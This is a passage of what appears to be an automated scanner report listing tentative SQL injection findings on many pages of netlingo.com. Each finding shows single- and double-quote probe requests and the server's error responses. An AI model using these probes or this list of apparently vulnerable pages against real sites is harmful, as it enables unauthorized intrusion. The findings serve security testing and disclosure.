X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /archive.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:52:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 40587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.69. http://www.netlingo.com/by-category/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /by-category/index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /by-category/index.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /by-category/index.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.70. http://www.netlingo.com/category/acronyms.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /category/acronyms.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /category/acronyms.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /category/acronyms.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 163340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.71. http://www.netlingo.com/category/business.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /category/business.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /category/business.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /category/business.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 83555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.72. http://www.netlingo.com/category/hardware.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /category/hardware.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /category/hardware.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /category/hardware.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 46206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.73. http://www.netlingo.com/category/marketing.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /category/marketing.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /category/marketing.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /category/marketing.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 46870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.74. http://www.netlingo.com/category/net-organization.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /category/net-organization.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /category/net-organization.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:50 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /category/net-organization.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 50980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.75. http://www.netlingo.com/category/programming.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /category/programming.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /category/programming.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /category/programming.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 40843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.76. http://www.netlingo.com/category/software.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /category/software.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /category/software.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /category/software.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 45055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.77. http://www.netlingo.com/category/technology.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /category/technology.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /category/technology.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /category/technology.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 60392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.78. http://www.netlingo.com/contact/contact-us.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /contact/contact-us.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /contact/contact-us.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /contact/contact-us.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34739

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.79. http://www.netlingo.com/contact/linktonetlingo.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /contact/linktonetlingo.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /contact/linktonetlingo.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /contact/linktonetlingo.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.80. http://www.netlingo.com/country.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /country.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /country.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /country.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 36558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.81. http://www.netlingo.com/hello/welcome.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /hello/welcome.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /hello/welcome.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /hello/welcome.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.82. http://www.netlingo.com/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /index.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:47:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /index.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:47:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 46223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.83. http://www.netlingo.com/iphone [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /iphone

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /iphone?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /iphone?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32382


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><!--Programming, Authoring, and Design by Erin Jansen and Vincent James, NetLingo.com is copyrighted and trademarked -->
<head>
<
...[SNIP]...

1.84. http://www.netlingo.com/iphone/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /iphone/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /iphone/?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /iphone/?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32382


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><!--Programming, Authoring, and Design by Erin Jansen and Vincent James, NetLingo.com is copyrighted and trademarked -->
<head>
<
...[SNIP]...

1.85. http://www.netlingo.com/iphone/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /iphone/index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /iphone/index.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /iphone/index.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32391


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><!--Programming, Authoring, and Design by Erin Jansen and Vincent James, NetLingo.com is copyrighted and trademarked -->
<head>
<
...[SNIP]...

1.86. http://www.netlingo.com/more/adsizes.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /more/adsizes.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /more/adsizes.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /more/adsizes.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 29479


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><!--Programming, Authoring, and Design by Erin Jansen and Vincent James, NetLingo.com is copyrighted and trademarked -->
<head>
...[SNIP]...

1.87. http://www.netlingo.com/press/about-netlingo.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /press/about-netlingo.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

